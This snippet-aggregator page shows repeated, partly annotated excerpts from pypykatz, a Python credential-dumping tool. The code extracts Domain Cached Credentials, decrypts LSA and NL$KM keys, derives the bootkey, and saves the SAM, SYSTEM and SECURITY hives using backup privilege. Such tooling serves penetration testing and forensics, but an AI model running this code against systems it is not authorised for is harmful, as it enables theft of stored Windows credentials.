How to use pypykatz - 10 common examples

To help you get started, we’ve selected a few pypykatz examples, based on popular ways it is used in public projects.


github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
			record = self.getValue('Cache\\NL$IterationCount')[1]
			if record > 10240:
				self.dcc_iteration_count = record & 0xfffffc00
			else:
				self.dcc_iteration_count = record * 1024
				
		
		self.get_lsa_key()
		self.get_NKLM_key()
		
		for value in values:
			logger.debug('[SECURITY] DCC Checking value: %s' % value)
			record_data = self.hive.get_value('Cache\\%s' % value.decode())[1]
			record = NL_RECORD.from_bytes(record_data)
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def dump_dcc(self):
		"""Parse the Domain Cached Credentials (DCC) entries stored under the SECURITY hive's ``Cache`` key.

		Walks the values of ``Cache``, drops the two control values that are not
		credential records (``NL$Control`` and ``NL$IterationCount``) and returns
		early, with a debug log line, when the key or its values are absent.

		NOTE(review): this excerpt is truncated. The original method continues
		after the ``NL$IterationCount`` removal (iteration-count parsing, the LSA
		and NL$KM key fetch, and the per-value decryption loop).
		"""
		logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		# NL$Control is a housekeeping value, not a cached credential record.
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		# NL$IterationCount is likewise not a record; its value feeds
		# self.dcc_iteration_count (parsed in the part of the method cut off here).
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
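def get_lsa_key(self):
		"""Locate the encrypted LSA secrets key in the SECURITY hive and hand it to ``decrypt_lsa_key``.

		The primary location ``Policy\\PolEKList\\default`` is tried first. When it
		is absent the legacy ``Policy\\PolSecretEncryptionKey\\default`` value is
		used instead and ``self.lsa_secret_key_vista_type`` is set to ``False`` so
		that ``decrypt_lsa_key`` takes its legacy (MD5-based) branch.

		Returns:
			The result of ``self.decrypt_lsa_key`` for the raw value data, or
			``None`` when neither registry value exists.
		"""
		logger.debug('[SECURITY] Fetching LSA key...')
		value = self.hive.get_value('Policy\\PolEKList\\default', False)
		if value is None:
			value = self.hive.get_value('Policy\\PolSecretEncryptionKey\\default', False)
			if not value:
				logger.debug('[SECURITY] LSA key not found!')
				return None
			
			# Only the legacy location exists, so the secret is in the legacy
			# format. The previous log line said "VISTA type" here, which is the
			# opposite of the flag being set and misleads anyone reading the log.
			self.lsa_secret_key_vista_type = False
			logger.debug('[SECURITY] LSA secrets use pre-VISTA type')
		
		# Index 1 of the returned tuple is the raw (still encrypted) value data.
		return self.decrypt_lsa_key(value[1])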
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def dump_dcc(self):
		"""Parse the Domain Cached Credentials (DCC) entries stored under the SECURITY hive's ``Cache`` key.

		Walks the values of ``Cache``, drops the two control values that are not
		credential records, records the configured iteration count in
		``self.dcc_iteration_count`` and fetches the LSA key needed to decrypt
		the remaining entries.

		NOTE(review): this excerpt is truncated. The original method continues
		after ``self.get_lsa_key()`` with ``self.get_NKLM_key()`` and the
		per-value decryption loop.
		"""
		logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		# NL$Control is a housekeeping value, not a cached credential record.
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
			# NOTE(review): every other hive read in this class goes through
			# self.hive.get_value(...); confirm that self.getValue exists on the
			# class, otherwise this line raises AttributeError on hosts that set
			# NL$IterationCount.
			record = self.getValue('Cache\\NL$IterationCount')[1]
			# Two encodings of the stored count: a value above 10240 is taken
			# as-is with the low 10 bits masked off, a smaller value is a
			# multiplier of 1024.
			if record > 10240:
				self.dcc_iteration_count = record & 0xfffffc00
			else:
				self.dcc_iteration_count = record * 1024
				
		
		self.get_lsa_key()
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def decrypt_lsa_key(self, data):
		logger.debug('[SECURITY] Decrypting LSA key...')
		if self.lsa_secret_key_vista_type is True:
			record = LSA_SECRET.from_bytes(data)
			key = SECURITY.sha256_multi(self.bootkey, record.data[:32])
			secret_dec = b''
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
					block += b'\x00' * (n - len(block))
				secret_dec += cipher.decrypt(block)
			record = LSA_SECRET_BLOB.from_bytes(secret_dec)
			self.lsa_key = record.secret[52:][:32]
		
		else:
			ctx = hashlib.md5(self.bootkey)
			for i in range(1000):
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def get_NKLM_key(self):
		logger.debug('[SECURITY] Fetching NK$LM key...')
		if self.lsa_key is None:
			self.get_lsa_secret_key()
			
		value = self.hive.get_value('Policy\\Secrets\\NL$KM\\CurrVal\\default')
		if value is None:
			logger.error('[SECURITY] Could not find NL$KM in registry')
			raise Exception('Could not find NL$KM in registry :(')
			
		if self.lsa_secret_key_vista_type is True:
			self.NKLM_key = b''
			record = LSA_SECRET.from_bytes(value[1])
			key = SECURITY.sha256_multi(self.lsa_key, record.data[:32])
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
github skelsec / pypykatz / pypykatz / registry / system / system.py View on Github external
if self.bootkey is not None:
			return self.bootkey
		if self.currentcontrol is None:
			self.get_currentcontrol()
			
		transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
		bootkey_obf = ''
		for key in ['JD', 'Skew1', 'GBG', 'Data']:
			bootkey_obf += self.hive.get_class('%s\\Control\\Lsa\\%s' % (self.currentcontrol, key))
		
		bootkey_obf = bytes.fromhex(bootkey_obf)
		self.bootkey = b''
		for i in range(len(bootkey_obf)):
			self.bootkey += bootkey_obf[transforms[i]:transforms[i] + 1]
		
		logger.debug('[SYSTEM] bootkey: %s' % self.bootkey.hex())
		return self.bootkey
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
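def get_lsa_key(self):
		"""Locate the encrypted LSA secrets key in the SECURITY hive and hand it to ``decrypt_lsa_key``.

		The primary location ``Policy\\PolEKList\\default`` is tried first. When it
		is absent the legacy ``Policy\\PolSecretEncryptionKey\\default`` value is
		used instead and ``self.lsa_secret_key_vista_type`` is set to ``False`` so
		that ``decrypt_lsa_key`` takes its legacy (MD5-based) branch.

		Returns:
			The result of ``self.decrypt_lsa_key`` for the raw value data, or
			``None`` when neither registry value exists.
		"""
		logger.debug('[SECURITY] Fetching LSA key...')
		value = self.hive.get_value('Policy\\PolEKList\\default', False)
		if value is None:
			value = self.hive.get_value('Policy\\PolSecretEncryptionKey\\default', False)
			if not value:
				logger.debug('[SECURITY] LSA key not found!')
				return None
			
			# Only the legacy location exists, so the secret is in the legacy
			# format. The previous log line said "VISTA type" here, which is the
			# opposite of the flag being set and misleads anyone reading the log.
			self.lsa_secret_key_vista_type = False
			logger.debug('[SECURITY] LSA secrets use pre-VISTA type')
		
		# Index 1 of the returned tuple is the raw (still encrypted) value data.
		return self.decrypt_lsa_key(value[1])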
github skelsec / pypykatz / pypykatz / registry / offline_parser.py View on Github external
import ntpath
		except Exception as e:
			logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
			raise
			
		sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		
		locations = [
			('SAM', sam_name),
			('SYSTEM', system_name),
			('SECURITY', security_name),
		]
		
		logger.debug('Obtaining SE_BACKUP privilege...')
		try:
			po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
github skelsec / pypykatz / pypykatz / registry / system / system.py View on Github external
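def get_currentcontrol(self):
		"""Resolve, and cache in ``self.currentcontrol``, the active control set name of the SYSTEM hive.

		Reads the integer stored in ``Select\\Current`` and formats it as
		``ControlSetNNN``; that name is the prefix the bootkey code uses for its
		``...\\Control\\Lsa\\...`` class-name lookups.

		Returns:
			str: the control set name, e.g. ``"ControlSet001"``.

		Raises:
			Exception: when ``Select\\Current`` is not present in the hive.
		"""
		logger.debug('[SYSTEM] determining current control set')
		if self.currentcontrol is not None:
			return self.currentcontrol
			
		# hive.get_value() yields None for a missing value (the other hive reads
		# in this parser check for it); fail with a clear message rather than a
		# TypeError from indexing None.
		value = self.hive.get_value('Select\\Current')
		if value is None:
			logger.error('[SYSTEM] Could not find Select\\Current in registry')
			raise Exception('Could not find Select\\Current in registry')
		ccs = value[1]
		self.currentcontrol = "ControlSet%03d" % ccs
		logger.debug('[SYSTEM] current control set name: %s' % self.currentcontrol)
		return self.currentcontrol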